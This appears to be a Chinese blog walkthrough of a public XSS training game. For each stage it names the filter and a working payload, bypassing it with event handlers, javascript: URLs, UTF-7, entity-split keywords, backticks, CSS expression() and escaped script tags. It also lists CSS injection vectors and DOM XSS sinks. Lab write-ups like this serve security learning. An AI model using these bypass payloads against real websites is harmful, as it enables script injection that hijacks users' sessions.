美文网首页我爱编程
XSS Challenges部分题目总结

XSS Challenges部分题目总结

作者: Smi1e_ | 来源:发表于2018-04-12 17:29 被阅读0次

    怎样进行Xss攻击


    XSS Challenges:http://xss-quiz.int21h.jp/
    这是一个日本的孩子写得xss测试关卡,一共19关。

    第四关:http://xss-quiz.int21h.jp/stage_4.php?sid=04fb39847db7e3f24b1287a4be7e22b1ba79ec74

    Hint: invisible input field
    抓包发现有三个参数,通过测试发现前两个都被过滤了关键字符,而第三个没有过滤。

    图片.png 图片.png 用第三个参数构造闭合语句
    1"><img src=1 onerror= alert(document.domain)> 图片.png

    第六关:http://xss-quiz.int21h.jp/stage-no6.php?sid=10284e95452262a58b13c86015336f4489b6152e

    输入<>/"发现<>被过滤,可以在input中构造onxxx语句。

    图片.png
    1" onclick="alert(document.domain) 图片.png

    第八关:http://xss-quiz.int21h.jp/stage008.php?sid=8407d42ea5cf46b072f5a358abffa591a449a2ba

    提示:the 'javascript' scheme.
    <>"\都被过滤了,但是可以用JS的伪协议,点击链接弹窗

    图片.png
    javascript:alert(document.domain) 图片.png

    第九关:http://xss-quiz.int21h.jp/stage_09.php?sid=fcf3010be4306306e9668ee51b9d6916c0b3e129

    提示:UTF-7 XSS
    XSS事项 UTF-7: 消失的字符集
    IE6/7 UTF7 XSS 漏洞攻击,这个攻击只对 IE6/IE7 起作用, 从 IE8 起微软已经修复了

    "<>都被转义了,当然也不能用onmouseover和onclick,根据提示,用UTF-7编码解码工具,将" onmousemove="alert(document.domain)转为UTF-7编码:
    p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg- x=%2bACI-&charset=UTF-7

    这个对使用的IE浏览器有一定的限制,大部分浏览器都已经修复了这个漏洞,但IE7还没有

    第十一关:http://xss-quiz.int21h.jp/stage11th.php?sid=4a4c328baf358d9bf01befc79228e70d25549025

    提示:s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;
    没有过滤<>"/,
    1,script会被替换为xscript 
    2,on事件会被替换为onxxx
    3,style会被替换为stxxx

    图片.png 图片.png
    所以只能用a标签,<a href="javascript:alert(document.domain)">123</a>,可是还是有script,所以要将script中的某个字符转为unicode编码,或者可以插入&#09;不可见字符。
    尝试用tab制表(%09),换行(%0a,%0d,%0a%0d)等符号都不行。

    输入"><a href=javascri%09pt:alert(1)>test</a>,显示发现后面的那一段被截断了。 图片.png

    %09也就是tab制表符,使用在单个标签之内,会被浏览器正确去除,而在跨标签的时候(也就是闭合前面原有标签,使用在构造者构造的新标签的时候)不会被正确去除。也仅仅是%09,其十进制编码和十六进制编码都不会受影响。后面测试发现%0a和%0d一样受到影响。
    参考payload:
    "><a href=javascri&#09pt:alert(document.domain)>test</a> //&#09 tab制表符html十进制编码
    "><a href=javascri&NewLine;pt&colon;alert(document.domain)>test</a> //&NewLine;是html5的换行符,&colon;是冒号

    HTML的16进制转义符 HTML Punctuation Special Characters

    第十二关:http://xss-quiz.int21h.jp/stage_no012.php?sid=66a49c46b3d8e490003681f359c7b8b14ba174c8

    提示:s/[\x00-\x20&lt;&gt;"']//g;
    <>"被过滤,根据提示可以知道x00-,x20,<,>,",'都被过滤了,但是`还没被过滤,于是可以用`加上onclick,onmouseover,onfocus均可,还有一个前提是IE,只有IE才有这个特性

    图片.png

    由于IE的特性,或者说浏览器竞争时代百家争鸣导致的结果,会把`解析为引号。

    第十三关:http://xss-quiz.int21h.jp/stage13_0.php?sid=ea59af045ae260dd938d73d6cbbd1c92a6806e06

    提示:style attribute6
    css中的expression
    支持者:IE5至IE7浏览器。expression这个语法只存在ie上。

    xss:expr/*XSS*/ession(alert(document.domain));
    还有一种:
    background-color:#f00;background:url("javascript:alert(document.domain);");
    

    现实环境中不可能有如此简单就能插入的地方
    话说,现实中怎么利用
    有2种注入:

    (1)@import 和 expression

        @import "http://web/xss.css"  
        @import 'javascript:alert("xss")'  
        body{xss:expression(alert('xss'))]  
        <img style="xss:expression(alert('xss'))">  
    

    (2)css代码中js,vs脚本

        body{backgroud-image:url(javascript:alert('xss'))}  
        body{backgroud-image:url(vbscript:msgbox('xss'))}  
    

    第十五关:http://xss-quiz.int21h.jp/stage__15.php?sid=1e785fb96bdb203c00b034203ee574681d1b4403

    提示:document.write();
    输入<>"/发现<>"被过滤了

    图片.png
    有几种绕过过滤的方法:
    第一种:换成16进制编码\x3cscript\x3ealert(document.domain);\x3c/script\x3e
    第二种:换成Unicode编码\u003cscript\u003ealert(document.domain);\u003c/script\u003e
    第三种:换成十进制编码\74script\76alert(document.domain);\74/script\76
    (两个\是因为过滤了单个)

    能引起Dom XSS的入口函数总结
        document.write()    
        document.writeln()    
        document.body.innerHtml    
        eval()    
        window.execScript()    
        window.setInterval()    
        window.setTimeout()   
    

    第十七关:http://xss-quiz.int21h.jp/stage-No17.php?sid=a207c91d7b4cb2634e277df104c853554347e8ca

    提示:multi-byte character
    Multi-Byte Character Set & Use Unicode Character Set
    (浏览器版本问题不能成功,IE8已经修复)双引号是0x22,总体思路类似宽字节注入,这个技巧在sql注入中很常用,如%0c可以吃掉一个反斜杠,就是用一个特殊字节吃掉Name中的第二个",然后Name和E-mail的第一个"就闭合构成了value,然后插入onxxx,最后再吃掉最后一的"。

    图片.png 图片.png
    抓包payloadp1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

    第十八关:http://xss-quiz.int21h.jp/stage__No18.php?sid=b23d6719a639f5655a2966a2f5ade6ec86841851

    提示:us-ascii high bit issue
    这个源自于浏览器瞎解释,他会把一些8位的字符直接解释成7位ascii(漏洞已经在IE8中修补了)

    图片.png
    就是说浏览器会忽略掉一些8位字符的第一位,如BC和<2进制的后7位相同,浏览器会把他当做BC,并不会过滤。(二进制和16进制可以和字符间相互转换)
    参考文献
    https://blog.csdn.net/emaste_r/article/details/16988167
    https://www.cnblogs.com/sherlock17/p/6700430.html

    相关文章

      网友评论

        本文标题:XSS Challenges部分题目总结

        本文链接:https://www.haomeiwen.com/subject/dhtfkftx.html